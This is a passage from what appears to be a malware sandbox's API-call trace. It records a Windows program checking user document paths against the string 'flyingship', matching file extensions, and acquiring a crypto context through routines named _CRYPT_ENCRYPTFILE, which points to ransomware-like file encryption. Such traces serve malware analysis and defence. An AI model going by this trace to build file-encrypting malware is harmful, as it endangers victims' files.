lpString1="n0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.549] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0177.549] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0177.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ots", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ots", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0177.549] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d7e0f10, ftCreationTime.dwHighDateTime=0x1d5e5c6, ftLastAccessTime.dwLowDateTime=0xf64cede0, ftLastAccessTime.dwHighDateTime=0x1d5e360, ftLastWriteTime.dwLowDateTime=0xf64cede0, ftLastWriteTime.dwHighDateTime=0x1d5e360, nFileSizeHigh=0x0, nFileSizeLow=0x17fea, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="B1Y6naM2jHwq3MoZolB.ots", cAlternateFileName="B1Y6NA~1.OTS")) returned 0x90ae18 [0177.549] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0177.549] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0177.549] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.549] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0177.550] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0177.550] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0177.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0177.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0177.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0177.550] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0177.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0177.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0177.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0177.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0177.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0177.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0177.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0177.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0177.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0177.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0177.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0177.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0177.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0177.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0177.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0177.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0177.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0177.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0177.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.555] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0177.555] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | 